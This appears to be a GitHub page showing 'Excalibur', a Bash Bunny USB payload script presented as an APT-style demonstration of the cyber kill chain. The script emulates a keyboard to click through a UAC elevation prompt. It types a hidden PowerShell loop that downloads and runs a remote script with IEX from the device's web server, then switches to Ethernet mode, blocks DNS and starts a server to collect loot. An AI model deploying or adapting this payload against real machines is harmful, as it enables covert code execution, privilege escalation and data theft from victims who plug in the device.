-
Notifications
You must be signed in to change notification settings - Fork 40
/
Copy pathpayload.txt
71 lines (63 loc) · 1.51 KB
/
payload.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/bin/bash
# .-.
# (0.0)
# '=.|m|.='
# .='/@\`=.
# @8@
# _ 8@8 _
# (@__/@8@\__@)
# `-=:8@8:=-'
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# \:/
# ^
#
# Title: Excalibur
# Author: Dviros, Dora
# Version: 1.0
#
# Excalibur is an APT based "Powershell" for the Bashbunny project.
# Its purpose is to reflect on how a "simple" USB drive can execute the 7 cyber kill chain.
LED SETUP
# Creating Loot Folders
LOOTDIR=/root/udisk/loot/Excalibur
mkdir -p $LOOTDIR
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
mkdir -p $SWITCHDIR/loot
# HID Attack Starts
ATTACKMODE HID
# UAC Bypass
LED STAGE1
RUN WIN powershell -c "Start-Process cmd -verb runas"
Q DELAY 250
Q ENTER
Q DELAY 1500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1500
LED STAGE2
#Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p_v2.ps1');exit}}\""
Q DELAY 300
Q ENTER
# Ethernet Attack Starts
ATTACKMODE RNDIS_ETHERNET
LED SPECIAL1
# mount -o sync /dev/nandf /root/udisk
iptables -A OUTPUT -p udp --dport 53 -j DROP
python $SWITCHDIR/server.py
#Wait for EOF in loot folder
LED SPECIAL2
sleep 60
done